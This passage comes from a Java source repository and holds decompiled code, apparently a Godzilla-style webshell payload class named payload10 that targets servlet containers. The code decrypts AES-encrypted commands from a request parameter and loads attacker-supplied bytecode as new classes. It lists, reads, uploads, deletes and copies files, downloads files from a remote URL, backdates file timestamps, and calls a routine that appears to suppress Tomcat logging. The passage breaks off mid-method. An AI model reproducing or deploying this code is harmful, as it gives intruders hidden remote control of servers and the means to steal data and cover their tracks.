1464 | final Method setAttributeMethod = this.getMethodByClass(class2, methodName2, parameters2); 1465 | setAttributeMethod.invoke(condition, condition); 1466 | valve = this.invoke(valve, "getNext", null); 1467 | continue; 1468 | } 1469 | } 1470 | if (Class.forName("org.apache.catalina.Valve", false, applicationContext.getClass().getClassLoader()).isAssignableFrom(valve.getClass())) { 1471 | valve = this.invoke(valve, "getNext", null); 1472 | } 1473 | else { 1474 | valve = null; 1475 | } 1476 | } 1477 | } 1478 | } 1479 | catch (Exception ex4) {} 1480 | } 1481 | } 1482 | catch (Exception ex5) {} 1483 | } 1484 | 1485 | private static Class getClass(final String name) { 1486 | try { 1487 | return Class.forName(name); 1488 | } 1489 | catch (Exception e) { 1490 | return null; 1491 | } 1492 | } 1493 | 1494 | public static int bytesToInt(final byte[] bytes) { 1495 | final int i = (bytes[0] & 0xFF) | (bytes[1] & 0xFF) << 8 | (bytes[2] & 0xFF) << 16 | (bytes[3] & 0xFF) << 24; 1496 | return i; 1497 | } 1498 | 1499 | public String base64Encode(final String data) { 1500 | return base64Encode(data.getBytes()); 1501 | } 1502 | 1503 | public static String base64Encode(final byte[] src) { 1504 | final int off = 0; 1505 | final int end = src.length; 1506 | final byte[] dst = new byte[4 * ((src.length + 2) / 3)]; 1507 | final int linemax = -1; 1508 | final boolean doPadding = true; 1509 | final char[] base64 = payload.toBase64; 1510 | int sp = off; 1511 | int slen = (end - off) / 3 * 3; 1512 | final int sl = off + slen; 1513 | if (linemax > 0 && slen > linemax / 4 * 3) { 1514 | slen = linemax / 4 * 3; 1515 | } 1516 | int dp = 0; 1517 | while (sp < sl) { 1518 | final int sl2 = Math.min(sp + slen, sl); 1519 | int bits; 1520 | for (int sp2 = sp, dp2 = dp; sp2 < sl2; bits = ((src[sp2++] & 0xFF) << 16 | (src[sp2++] & 0xFF) << 8 | (src[sp2++] & 0xFF)), dst[dp2++] = (byte)base64[bits >>> 18 & 0x3F], dst[dp2++] = (byte)base64[bits >>> 12 & 0x3F], dst[dp2++] = (byte)base64[bits >>> 6 & 0x3F], dst[dp2++] = (byte)base64[bits & 0x3F]) {} 1521 | final int dlen = (sl2 - sp) / 3 * 4; 1522 | dp += dlen; 1523 | sp = sl2; 1524 | } 1525 | if (sp < end) { 1526 | final int b0 = src[sp++] & 0xFF; 1527 | dst[dp++] = (byte)base64[b0 >> 2]; 1528 | if (sp == end) { 1529 | dst[dp++] = (byte)base64[b0 << 4 & 0x3F]; 1530 | if (doPadding) { 1531 | dst[dp++] = 61; 1532 | dst[dp++] = 61; 1533 | } 1534 | } 1535 | else { 1536 | final int b2 = src[sp++] & 0xFF; 1537 | dst[dp++] = (byte)base64[(b0 << 4 & 0x3F) | b2 >> 4]; 1538 | dst[dp++] = (byte)base64[b2 << 2 & 0x3F]; 1539 | if (doPadding) { 1540 | dst[dp++] = 61; 1541 | } 1542 | } 1543 | } 1544 | return new String(dst); 1545 | } 1546 | 1547 | public static byte[] base64Decode(final String base64Str) { 1548 | if (base64Str.length() == 0) { 1549 | return new byte[0]; 1550 | } 1551 | final byte[] src = base64Str.getBytes(); 1552 | int sp = 0; 1553 | final int sl = src.length; 1554 | int paddings = 0; 1555 | final int len = sl - sp; 1556 | if (src[sl - 1] == 61) { 1557 | ++paddings; 1558 | if (src[sl - 2] == 61) { 1559 | ++paddings; 1560 | } 1561 | } 1562 | if (paddings == 0 && (len & 0x3) != 0x0) { 1563 | paddings = 4 - (len & 0x3); 1564 | } 1565 | byte[] dst = new byte[3 * ((len + 3) / 4) - paddings]; 1566 | final int[] base64 = new int[256]; 1567 | Arrays.fill(base64, -1); 1568 | for (int i = 0; i < payload.toBase64.length; ++i) { 1569 | base64[payload.toBase64[i]] = i; 1570 | } 1571 | base64[61] = -2; 1572 | int dp = 0; 1573 | int bits = 0; 1574 | int shiftto = 18; 1575 | while (sp < sl) { 1576 | int b = src[sp++] & 0xFF; 1577 | if ((b = base64[b]) < 0 && b == -2) { 1578 | if ((shiftto == 6 && (sp == sl || src[sp++] != 61)) || shiftto == 18) { 1579 | throw new IllegalArgumentException("Input byte array has wrong 4-byte ending unit"); 1580 | } 1581 | break; 1582 | } 1583 | else { 1584 | bits |= b << shiftto; 1585 | shiftto -= 6; 1586 | if (shiftto >= 0) { 1587 | continue; 1588 | } 1589 | dst[dp++] = (byte)(bits >> 16); 1590 | dst[dp++] = (byte)(bits >> 8); 1591 | dst[dp++] = (byte)bits; 1592 | shiftto = 18; 1593 | bits = 0; 1594 | } 1595 | } 1596 | if (shiftto == 6) { 1597 | dst[dp++] = (byte)(bits >> 16); 1598 | } 1599 | else if (shiftto == 0) { 1600 | dst[dp++] = (byte)(bits >> 16); 1601 | dst[dp++] = (byte)(bits >> 8); 1602 | } 1603 | else if (shiftto == 12) { 1604 | throw new IllegalArgumentException("Last unit does not have enough valid bits"); 1605 | } 1606 | if (dp != dst.length) { 1607 | final byte[] arrayOfByte = new byte[dp]; 1608 | System.arraycopy(dst, 0, arrayOfByte, 0, Math.min(dst.length, dp)); 1609 | dst = arrayOfByte; 1610 | } 1611 | return dst; 1612 | } 1613 | } 1614 | -------------------------------------------------------------------------------- /src/main/java/payload10.java: -------------------------------------------------------------------------------- 1 | import jakarta.servlet.ServletRequest; 2 | import jakarta.servlet.ServletResponse; 3 | import javax.imageio.ImageIO; 4 | import java.awt.*; 5 | import java.awt.image.BufferedImage; 6 | import java.io.*; 7 | import java.lang.reflect.Field; 8 | import java.lang.reflect.Method; 9 | import java.net.InetAddress; 10 | import java.net.NetworkInterface; 11 | import java.net.URL; 12 | import java.nio.file.Files; 13 | import java.nio.file.LinkOption; 14 | import java.nio.file.Path; 15 | import java.nio.file.Paths; 16 | import java.nio.file.attribute.BasicFileAttributeView; 17 | import java.nio.file.attribute.FileTime; 18 | import java.sql.*; 19 | import java.text.SimpleDateFormat; 20 | import java.util.Date; 21 | import java.util.List; 22 | import java.util.*; 23 | import java.util.zip.GZIPInputStream; 24 | import java.util.zip.GZIPOutputStream; 25 | 26 | // 27 | // Decompiled by Procyon v0.5.36 28 | // 29 | 30 | public class payload10 extends ClassLoader 31 | { 32 | public static final char[] toBase64; 33 | HashMap parameterMap; 34 | HashMap sessionMap; 35 | Object servletContext; 36 | Object servletRequest; 37 | Object servletResponse; 38 | Object httpSession; 39 | byte[] requestData; 40 | ByteArrayOutputStream outputStream; 41 | static /* synthetic */ Class class$0; 42 | static /* synthetic */ Class class$1; 43 | static /* synthetic */ Class class$2; 44 | static /* synthetic */ Class class$3; 45 | static /* synthetic */ Class class$4; 46 | static /* synthetic */ Class class$5; 47 | static /* synthetic */ Class class$6; 48 | static /* synthetic */ Class class$7; 49 | static /* synthetic */ Class class$8; 50 | static /* synthetic */ Class class$9; 51 | static /* synthetic */ Class class$10; 52 | public String pass; 53 | public String xc ; 54 | String md5=md5(pass+xc); 55 | static { 56 | toBase64 = new char[] { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/' }; 57 | } 58 | 59 | 60 | 61 | public payload10() { 62 | this.parameterMap = new HashMap(); 63 | } 64 | 65 | public payload10(final ClassLoader loader) { 66 | super(loader); 67 | this.parameterMap = new HashMap(); 68 | } 69 | 70 | public static String md5(String s) { 71 | String ret = null; 72 | try { 73 | java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5"); 74 | m.update(s.getBytes(), 0, s.length()); 75 | ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); 76 | }catch (Exception e) {} 77 | return ret; 78 | } 79 | public byte[] x(byte[] s,boolean m,String xc){ //字节码进行AES加密 80 | try{ 81 | javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES"); 82 | c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES")); 83 | return c.doFinal(s); 84 | } 85 | catch (Exception e){return null; } 86 | } 87 | public Class g(final byte[] b) { 88 | return super.defineClass(b, 0, b.length); 89 | } 90 | 91 | public byte[] run() { 92 | try { 93 | final String className = this.get("evalClassName"); 94 | final String methodName = this.get("methodName"); 95 | if (methodName == null) { 96 | return "method is null".getBytes(); 97 | } 98 | if (className == null) { 99 | final Method method = this.getClass().getMethod(methodName, (Class[])null); 100 | final Class returnType = method.getReturnType(); 101 | Class class$0; 102 | if ((class$0 = payload10.class$0) == null) { 103 | try { 104 | class$0 = (payload10.class$0 = Class.forName("[B")); 105 | } 106 | catch (ClassNotFoundException ex) { 107 | throw new NoClassDefFoundError(ex.getMessage()); 108 | } 109 | } 110 | if (returnType.isAssignableFrom(class$0)) { 111 | return (byte[])method.invoke(this, (Object[])null); 112 | } 113 | return "this method returnType not is byte[]".getBytes(); 114 | } 115 | else { 116 | final Class evalClass = (Class) this.sessionMap.get(className); 117 | if (evalClass == null) { 118 | return "evalClass is null".getBytes(); 119 | } 120 | final Object object = evalClass.newInstance(); 121 | object.equals(this.parameterMap); 122 | object.toString(); 123 | final Object resultObject = this.parameterMap.get("result"); 124 | if (resultObject == null) { 125 | return new byte[0]; 126 | } 127 | Class class$2; 128 | if ((class$2 = payload10.class$0) == null) { 129 | try { 130 | class$2 = (payload10.class$0 = Class.forName("[B")); 131 | } 132 | catch (ClassNotFoundException ex2) { 133 | throw new NoClassDefFoundError(ex2.getMessage()); 134 | } 135 | } 136 | if (class$2.isAssignableFrom(resultObject.getClass())) { 137 | return (byte[])resultObject; 138 | } 139 | return "return typeErr".getBytes(); 140 | } 141 | } 142 | catch (Throwable e) { 143 | final ByteArrayOutputStream stream = new ByteArrayOutputStream(); 144 | final PrintStream printStream = new PrintStream(stream); 145 | e.printStackTrace(printStream); 146 | printStream.flush(); 147 | printStream.close(); 148 | return stream.toByteArray(); 149 | } 150 | } 151 | 152 | public void formatParameter() { 153 | this.parameterMap.clear(); 154 | this.parameterMap.put("sessionMap", this.sessionMap); 155 | this.parameterMap.put("servletRequest", this.servletRequest); 156 | this.parameterMap.put("servletContext", this.servletContext); 157 | this.parameterMap.put("httpSession", this.httpSession); 158 | final byte[] parameterByte = this.requestData; 159 | final ByteArrayInputStream tStream = new ByteArrayInputStream(parameterByte); 160 | final ByteArrayOutputStream tp = new ByteArrayOutputStream(); 161 | String key = null; 162 | final byte[] lenB = new byte[4]; 163 | byte[] data = null; 164 | try { 165 | final GZIPInputStream inputStream = new GZIPInputStream(tStream); 166 | while (true) { 167 | final byte t = (byte)inputStream.read(); 168 | if (t == -1) { 169 | break; 170 | } 171 | if (t == 2) { 172 | key = new String(tp.toByteArray()); 173 | inputStream.read(lenB); 174 | final int len = bytesToInt(lenB); 175 | data = new byte[len]; 176 | int readOneLen = 0; 177 | while ((readOneLen += inputStream.read(data, readOneLen, data.length - readOneLen)) < data.length) {} 178 | this.parameterMap.put(key, data); 179 | tp.reset(); 180 | } 181 | else { 182 | tp.write(t); 183 | } 184 | } 185 | tp.close(); 186 | tStream.close(); 187 | inputStream.close(); 188 | } 189 | catch (Exception ex) {} 190 | } 191 | 192 | public boolean equals(Object obj) { 193 | handle(obj); 194 | ServletRequest request = (ServletRequest) this.servletRequest; 195 | ServletResponse response = (ServletResponse) this.servletResponse; 196 | try{ 197 | byte[] data = base64Decode(request.getParameter(this.pass)); 198 | data = x(data,false,xc); 199 | java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream(); 200 | handle(arrOut); 201 | this.noLog(this.servletContext); 202 | handle(data); 203 | this.noLog(this.servletContext); 204 | response.getWriter().write(this.md5.substring(0,16)); 205 | this.toString(); 206 | response.getWriter().write(base64Encode(x(arrOut.toByteArray(),true,xc))); 207 | response.getWriter().write(this.md5.substring(16)); 208 | }catch (Throwable throwable){} 209 | return true; 210 | } 211 | 212 | public boolean handle( Object obj) { 213 | if (obj == null) { 214 | return false; 215 | } 216 | Class class$1; 217 | if ((class$1 = payload10.class$1) == null) { 218 | try { 219 | class$1 = (payload10.class$1 = Class.forName("java.io.ByteArrayOutputStream")); 220 | } 221 | catch (ClassNotFoundException ex) { 222 | throw new NoClassDefFoundError(ex.getMessage()); 223 | } 224 | } 225 | if (class$1.isAssignableFrom(obj.getClass())) { 226 | this.outputStream = (ByteArrayOutputStream)obj; 227 | return false; 228 | } 229 | if (this.supportClass(obj, "%s.servlet.http.HttpServletRequest")) { 230 | this.servletRequest = obj; 231 | } 232 | else if (this.supportClass(obj, "%s.servlet.ServletRequest")) { 233 | this.servletRequest = obj; 234 | } 235 | else { 236 | Class class$2; 237 | if ((class$2 = payload10.class$0) == null) { 238 | try { 239 | class$2 = (payload10.class$0 = Class.forName("[B")); 240 | } 241 | catch (ClassNotFoundException ex2) { 242 | throw new NoClassDefFoundError(ex2.getMessage()); 243 | } 244 | } 245 | if (class$2.isAssignableFrom(obj.getClass())) { 246 | this.requestData = (byte[])obj; 247 | } 248 | else if (this.supportClass(obj, "%s.servlet.http.HttpSession")) { 249 | this.httpSession = obj; 250 | } 251 | } 252 | this.handlepayload10Context(obj); 253 | if (this.servletRequest != null && this.requestData == null) { 254 | final Object servletRequest = this.servletRequest; 255 | final String methodName = "getAttribute"; 256 | final Class[] parameterClass = { null }; 257 | final int n = 0; 258 | Class class$3; 259 | if ((class$3 = payload10.class$2) == null) { 260 | try { 261 | class$3 = (payload10.class$2 = Class.forName("java.lang.String")); 262 | } 263 | catch (ClassNotFoundException ex3) { 264 | throw new NoClassDefFoundError(ex3.getMessage()); 265 | } 266 | } 267 | parameterClass[n] = class$3; 268 | final Object retVObject = this.getMethodAndInvoke(servletRequest, methodName, parameterClass, new Object[] { "parameters" }); 269 | if (retVObject != null) { 270 | Class class$4; 271 | if ((class$4 = payload10.class$0) == null) { 272 | try { 273 | class$4 = (payload10.class$0 = Class.forName("[B")); 274 | } 275 | catch (ClassNotFoundException ex4) { 276 | throw new NoClassDefFoundError(ex4.getMessage()); 277 | } 278 | } 279 | if (class$4.isAssignableFrom(retVObject.getClass())) { 280 | this.requestData = (byte[])retVObject; 281 | } 282 | } 283 | } 284 | return true; 285 | } 286 | 287 | private void handlepayload10Context( Object obj) { 288 | try { 289 | if (Object[].class.isAssignableFrom(obj.getClass())){ 290 | Object[] objects = (Object[]) obj; 291 | this.servletRequest = objects[0]; 292 | this.servletContext = getMethodAndInvoke(objects[0],"getServletContext",null,null); 293 | this.servletResponse = objects[1]; 294 | this.httpSession = objects[2]; 295 | } else if (obj.getClass().getName().indexOf("PageContext")>=0) { 296 | final Method getRequestMethod = this.getMethodByClass(obj.getClass(), "getRequest", null); 297 | final Method getServletContextMethod = this.getMethodByClass(obj.getClass(), "getServletContext", null); 298 | final Method getSessionMethod = this.getMethodByClass(obj.getClass(), "getSession", null); 299 | final Method getResponseMethod = this.getMethodByClass(obj.getClass(), "getResponse", null); 300 | if (getRequestMethod != null && this.servletRequest == null) { 301 | this.servletRequest = getRequestMethod.invoke(obj, (Object[])null); 302 | } 303 | if (getServletContextMethod != null && this.servletContext == null) { 304 | this.servletContext = getServletContextMethod.invoke(obj, (Object[])null); 305 | } 306 | if (getSessionMethod != null && this.httpSession == null) { 307 | this.httpSession = getSessionMethod.invoke(obj, (Object[])null); 308 | } 309 | if (getResponseMethod != null && this.servletResponse == null){ 310 | this.servletResponse = getResponseMethod.invoke(obj,(Object[])null); 311 | } 312 | }else { 313 | Map objectMap = (Map) obj; 314 | this.servletRequest = objectMap.get("request"); 315 | this.servletContext = getMethodAndInvoke(this.servletRequest,"getServletContext",null,null); 316 | this.servletResponse = objectMap.get("response"); 317 | this.httpSession = objectMap.get("session"); 318 | } 319 | } 320 | catch (Exception ex) {} 321 | } 322 | 323 | private boolean supportClass( Object obj, String classNameString) { 324 | if (obj == null) { 325 | return false; 326 | } 327 | boolean ret = false; 328 | Class c = null; 329 | try { 330 | if ((c = getClass(String.format(classNameString, "javax"))) != null) { 331 | ret = c.isAssignableFrom(obj.getClass()); 332 | } 333 | if (!ret && (c = getClass(String.format(classNameString, "jakarta"))) != null) { 334 | ret = c.isAssignableFrom(obj.getClass()); 335 | } 336 | } 337 | catch (Exception ex) {} 338 | return ret; 339 | } 340 | 341 | public String toString() { 342 | String returnString = null; 343 | if (this.outputStream != null) { 344 | try { 345 | this.initSessionMap(); 346 | final GZIPOutputStream gzipOutputStream = new GZIPOutputStream(this.outputStream); 347 | this.formatParameter(); 348 | if (this.parameterMap.get("evalNextData") != null) { 349 | this.run(); 350 | this.requestData = (byte[]) this.parameterMap.get("evalNextData"); 351 | this.formatParameter(); 352 | } 353 | gzipOutputStream.write(this.run()); 354 | gzipOutputStream.close(); 355 | this.outputStream.close(); 356 | } 357 | catch (Throwable e) { 358 | returnString = e.getMessage(); 359 | } 360 | } 361 | else { 362 | returnString = "outputStream is null"; 363 | } 364 | this.httpSession = null; 365 | this.outputStream = null; 366 | this.parameterMap = null; 367 | this.requestData = null; 368 | this.servletContext = null; 369 | this.servletRequest = null; 370 | this.sessionMap = null; 371 | return returnString; 372 | } 373 | 374 | private void initSessionMap() { 375 | if (this.sessionMap == null) { 376 | if (this.getSessionAttribute("sessionMap") != null) { 377 | try { 378 | this.sessionMap = (HashMap)this.getSessionAttribute("sessionMap"); 379 | } 380 | catch (Exception ex) {} 381 | } 382 | else { 383 | this.sessionMap = new HashMap(); 384 | try { 385 | this.setSessionAttribute("sessionMap", this.sessionMap); 386 | } 387 | catch (Exception ex2) {} 388 | } 389 | if (this.sessionMap == null) { 390 | this.sessionMap = new HashMap(); 391 | } 392 | } 393 | } 394 | 395 | public String get( String key) { 396 | try { 397 | return new String((byte[]) this.parameterMap.get(key)); 398 | } 399 | catch (Exception e) { 400 | return null; 401 | } 402 | } 403 | 404 | public byte[] getByteArray( String key) { 405 | try { 406 | return (byte[]) this.parameterMap.get(key); 407 | } 408 | catch (Exception e) { 409 | return null; 410 | } 411 | } 412 | 413 | public byte[] test() { 414 | return "ok".getBytes(); 415 | } 416 | 417 | public byte[] getFile() { 418 | String dirName = this.get("dirName"); 419 | if (dirName != null) { 420 | dirName = dirName.trim(); 421 | String buffer = new String(); 422 | try { 423 | final String currentDir = new File(dirName).getAbsoluteFile() + "/"; 424 | final File currentDirFile = new File(currentDir); 425 | if (!currentDirFile.exists()) { 426 | return "dir does not exist".getBytes(); 427 | } 428 | final File[] files = currentDirFile.listFiles(); 429 | buffer = String.valueOf(buffer) + "ok"; 430 | buffer = String.valueOf(buffer) + "\n"; 431 | buffer = String.valueOf(buffer) + currentDir; 432 | buffer = String.valueOf(buffer) + "\n"; 433 | if (files != null) { 434 | for (int i = 0; i < files.length; ++i) { 435 | final File file = files[i]; 436 | try { 437 | buffer = String.valueOf(buffer) + file.getName(); 438 | buffer = String.valueOf(buffer) + "\t"; 439 | buffer = String.valueOf(buffer) + (file.isDirectory() ? "0" : "1"); 440 | buffer = String.valueOf(buffer) + "\t"; 441 | buffer = String.valueOf(buffer) + new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date(file.lastModified())); 442 | buffer = String.valueOf(buffer) + "\t"; 443 | buffer = String.valueOf(buffer) + Integer.toString((int)file.length()); 444 | buffer = String.valueOf(buffer) + "\t"; 445 | final StringBuffer append = new StringBuffer(String.valueOf(file.canRead() ? "R" : "")).append(file.canWrite() ? "W" : ""); 446 | Class class$3; 447 | if ((class$3 = payload10.class$3) == null) { 448 | try { 449 | class$3 = (payload10.class$3 = Class.forName("java.io.File")); 450 | } 451 | catch (ClassNotFoundException ex) { 452 | throw new NoClassDefFoundError(ex.getMessage()); 453 | } 454 | } 455 | final String fileState = append.append((this.getMethodByClass(class$3, "canExecute", null) != null) ? (file.canExecute() ? "X" : "") : "").toString(); 456 | buffer = String.valueOf(buffer) + ((fileState == null || fileState.trim().length() == 0) ? "F" : fileState); 457 | buffer = String.valueOf(buffer) + "\n"; 458 | } 459 | catch (Exception e) { 460 | buffer = String.valueOf(buffer) + e.getMessage(); 461 | buffer = String.valueOf(buffer) + "\n"; 462 | } 463 | } 464 | } 465 | } 466 | catch (Exception e2) { 467 | return String.format("dir does not exist errMsg:%s", e2.getMessage()).getBytes(); 468 | } 469 | return buffer.getBytes(); 470 | } 471 | return "No parameter dirName".getBytes(); 472 | } 473 | 474 | public String listFileRoot() { 475 | final File[] files = File.listRoots(); 476 | String buffer = new String(); 477 | for (int i = 0; i < files.length; ++i) { 478 | buffer = String.valueOf(buffer) + files[i].getPath(); 479 | buffer = String.valueOf(buffer) + ";"; 480 | } 481 | return buffer; 482 | } 483 | 484 | public byte[] fileRemoteDown() { 485 | final String url = this.get("url"); 486 | final String saveFile = this.get("saveFile"); 487 | if (url != null && saveFile != null) { 488 | FileOutputStream outputStream = null; 489 | try { 490 | final InputStream inputStream = new URL(url).openStream(); 491 | outputStream = new FileOutputStream(saveFile); 492 | final byte[] data = new byte[5120]; 493 | int readNum = -1; 494 | while ((readNum = inputStream.read(data)) != -1) { 495 | outputStream.write(data, 0, readNum); 496 | } 497 | outputStream.flush(); 498 | outputStream.close(); 499 | inputStream.close(); 500 | return "ok".getBytes(); 501 | } 502 | catch (Exception e2) { 503 | if (outputStream != null) { 504 | try { 505 | outputStream.close(); 506 | } 507 | catch (IOException e1) { 508 | return e1.getMessage().getBytes(); 509 | } 510 | } 511 | return String.format("%s : %s", e2.getClass().getName(), e2.getMessage()).getBytes(); 512 | } 513 | } 514 | return "url or saveFile is null".getBytes(); 515 | } 516 | 517 | public byte[] setFileAttr() { 518 | final String type = this.get("type"); 519 | final String attr = this.get("attr"); 520 | final String fileName = this.get("fileName"); 521 | String ret = "Null"; 522 | if (type != null && attr != null && fileName != null) { 523 | try { 524 | final File file = new File(fileName); 525 | if ("fileBasicAttr".equals(type)) { 526 | Class class$3; 527 | if ((class$3 = payload10.class$3) == null) { 528 | try { 529 | class$3 = (payload10.class$3 = Class.forName("java.io.File")); 530 | } 531 | catch (ClassNotFoundException ex) { 532 | throw new NoClassDefFoundError(ex.getMessage()); 533 | } 534 | } 535 | if (this.getMethodByClass(class$3, "setWritable", new Class[] { Boolean.TYPE }) != null) { 536 | if (attr.indexOf("R") != -1) { 537 | file.setReadable(true); 538 | } 539 | if (attr.indexOf("W") != -1) { 540 | file.setWritable(true); 541 | } 542 | if (attr.indexOf("X") != -1) { 543 | file.setExecutable(true); 544 | } 545 | ret = "ok"; 546 | return ret.getBytes(); 547 | } 548 | ret = "Java version is less than 1.6"; 549 | return ret.getBytes(); 550 | } 551 | else { 552 | if (!"fileTimeAttr".equals(type)) { 553 | ret = "no ExcuteType"; 554 | return ret.getBytes(); 555 | } 556 | Class class$4; 557 | if ((class$4 = payload10.class$3) == null) { 558 | try { 559 | class$4 = (payload10.class$3 = Class.forName("java.io.File")); 560 | } 561 | catch (ClassNotFoundException ex2) { 562 | throw new NoClassDefFoundError(ex2.getMessage()); 563 | } 564 | } 565 | if (this.getMethodByClass(class$4, "setLastModified", new Class[] { Long.TYPE }) != null) { 566 | Date date = new Date(0L); 567 | final StringBuilder builder = new StringBuilder(); 568 | builder.append(attr); 569 | final char[] cs = new char[13 - builder.length()]; 570 | Arrays.fill(cs, '0'); 571 | builder.append(cs); 572 | date = new Date(date.getTime() + Long.parseLong(builder.toString())); 573 | file.setLastModified(date.getTime()); 574 | ret = "ok"; 575 | try { 576 | final Class nioFile = Class.forName("java.nio.file.Paths"); 577 | final Class basicFileAttributeViewClass = Class.forName("java.nio.file.attribute.BasicFileAttributeView"); 578 | final Class filesClass = Class.forName("java.nio.file.Files"); 579 | if (nioFile != null && basicFileAttributeViewClass != null && filesClass != null) { 580 | final Path value = Paths.get(fileName, new String[0]); 581 | Class class$5; 582 | if ((class$5 = payload10.class$4) == null) { 583 | try { 584 | class$5 = (payload10.class$4 = Class.forName("java.nio.file.attribute.BasicFileAttributeView")); 585 | } 586 | catch (ClassNotFoundException ex3) { 587 | throw new NoClassDefFoundError(ex3.getMessage()); 588 | } 589 | } 590 | final BasicFileAttributeView attributeView = Files.getFileAttributeView(value, (Class)class$5, new LinkOption[0]); 591 | attributeView.setTimes(FileTime.fromMillis(date.getTime()), FileTime.fromMillis(date.getTime()), FileTime.fromMillis(date.getTime())); 592 | } 593 | } 594 | catch (Exception ex4) {} 595 | return ret.getBytes(); 596 | } 597 | ret = "Java version is less than 1.2"; 598 | return ret.getBytes(); 599 | } 600 | } 601 | catch (Exception e) { 602 | return String.format("Exception errMsg:%s", e.getMessage()).getBytes(); 603 | } 604 | } 605 | ret = "type or attr or fileName is null"; 606 | return ret.getBytes(); 607 | } 608 | 609 | public byte[] readFile() { 610 | final String fileName = this.get("fileName"); 611 | if (fileName != null) { 612 | final File file = new File(fileName); 613 | try { 614 | if (file.exists() && file.isFile()) { 615 | byte[] data = new byte[(int)file.length()]; 616 | if (data.length > 0) { 617 | int readOneLen = 0; 618 | final FileInputStream fileInputStream = new FileInputStream(file); 619 | while ((readOneLen += fileInputStream.read(data, readOneLen, data.length - readOneLen)) < data.length) {} 620 | fileInputStream.close(); 621 | } 622 | else { 623 | byte[] temData = new byte[3145728]; 624 | final FileInputStream fileInputStream = new FileInputStream(file); 625 | final int readLen = fileInputStream.read(temData); 626 | if (readLen > 0) { 627 | data = new byte[readLen]; 628 | System.arraycopy(temData, 0, data, 0, data.length); 629 | } 630 | fileInputStream.close(); 631 | temData = null; 632 | } 633 | return data; 634 | } 635 | return "file does not exist".getBytes(); 636 | } 637 | catch (Exception e) { 638 | return e.getMessage().getBytes(); 639 | } 640 | } 641 | return "No parameter fileName".getBytes(); 642 | } 643 | 644 | public byte[] uploadFile() { 645 | final String fileName = this.get("fileName"); 646 | final byte[] fileValue = this.getByteArray("fileValue"); 647 | if (fileName != null && fileValue != null) { 648 | try { 649 | final File file = new File(fileName); 650 | file.createNewFile(); 651 | final FileOutputStream fileOutputStream = new FileOutputStream(file); 652 | fileOutputStream.write(fileValue); 653 | fileOutputStream.close(); 654 | return "ok".getBytes(); 655 | } 656 | catch (Exception e) { 657 | return e.getMessage().getBytes(); 658 | } 659 | } 660 | return "No parameter fileName and fileValue".getBytes(); 661 | } 662 | 663 | public byte[] newFile() { 664 | final String fileName = this.get("fileName"); 665 | if (fileName != null) { 666 | final File file = new File(fileName); 667 | try { 668 | if (file.createNewFile()) { 669 | return "ok".getBytes(); 670 | } 671 | return "fail".getBytes(); 672 | } 673 | catch (Exception e) { 674 | return e.getMessage().getBytes(); 675 | } 676 | } 677 | return "No parameter fileName".getBytes(); 678 | } 679 | 680 | public byte[] newDir() { 681 | final String dirName = this.get("dirName"); 682 | if (dirName != null) { 683 | final File file = new File(dirName); 684 | try { 685 | if (file.mkdirs()) { 686 | return "ok".getBytes(); 687 | } 688 | return "fail".getBytes(); 689 | } 690 | catch (Exception e) { 691 | return e.getMessage().getBytes(); 692 | } 693 | } 694 | return "No parameter fileName".getBytes(); 695 | } 696 | 697 | public byte[] deleteFile() { 698 | final String dirName = this.get("fileName"); 699 | if (dirName != null) { 700 | try { 701 | final File file = new File(dirName); 702 | this.deleteFiles(file); 703 | return "ok".getBytes(); 704 | } 705 | catch (Exception e) { 706 | return e.getMessage().getBytes(); 707 | } 708 | } 709 | return "No parameter fileName".getBytes(); 710 | } 711 | 712 | public byte[] moveFile() { 713 | final String srcFileName = this.get("srcFileName"); 714 | final String destFileName = this.get("destFileName"); 715 | if (srcFileName != null && destFileName != null) { 716 | final File file = new File(srcFileName); 717 | try { 718 | if (!file.exists()) { 719 | return "The target does not exist".getBytes(); 720 | } 721 | if (file.renameTo(new File(destFileName))) { 722 | return "ok".getBytes(); 723 | } 724 | return "fail".getBytes(); 725 | } 726 | catch (Exception e) { 727 | return e.getMessage().getBytes(); 728 | } 729 | } 730 | return "No parameter srcFileName,destFileName".getBytes(); 731 | } 732 | 733 | public byte[] copyFile() { 734 | final String srcFileName = this.get("srcFileName"); 735 | final String destFileName = this.get("destFileName"); 736 | if (srcFileName != null && destFileName != null) { 737 | final File srcFile = new File(srcFileName); 738 | final File destFile = new File(destFileName); 739 | try { 740 | if (srcFile.exists() && srcFile.isFile()) { 741 | final FileInputStream fileInputStream = new FileInputStream(srcFile); 742 | final FileOutputStream fileOutputStream = new FileOutputStream(destFile); 743 | final byte[] data = new byte[5120]; 744 | int readNum = 0; 745 | while ((readNum = fileInputStream.read(data)) > -1) { 746 | fileOutputStream.write(data, 0, readNum); 747 | } 748 | fileInputStream.close(); 749 | fileOutputStream.close(); 750 | return "ok".getBytes(); 751 | } 752 | return "The target does not exist or is not a file".getBytes(); 753 | } 754 | catch (Exception e) { 755 | return e.getMessage().getBytes(); 756 | } 757 | } 758 | return "No parameter srcFileName,destFileName".getBytes(); 759 | } 760 | 761 | public byte[] include() { 762 | final byte[] binCode = this.getByteArray("binCode"); 763 | final String className = this.get("codeName"); 764 | if (binCode != null && className != null) { 765 | try { 766 | final payload10 payload10 = new payload10(this.getClass().getClassLoader()); 767 | final Class module = payload10.g(binCode); 768 | this.sessionMap.put(className, module); 769 | return "ok".getBytes(); 770 | } 771 | catch (Exception e) { 772 | if (this.sessionMap.get(className) != null) { 773 | return "ok".getBytes(); 774 | } 775 | return e.getMessage().getBytes(); 776 | } 777 | } 778 | return "No parameter binCode,codeName".getBytes(); 779 | } 780 | 781 | public Object getSessionAttribute(final String keyString) { 782 | if (this.httpSession != null) { 783 | final Object httpSession = this.httpSession; 784 | final String methodName = "getAttribute"; 785 | final Class[] parameterClass = { null }; 786 | final int n = 0; 787 | Class class$2; 788 | if ((class$2 = 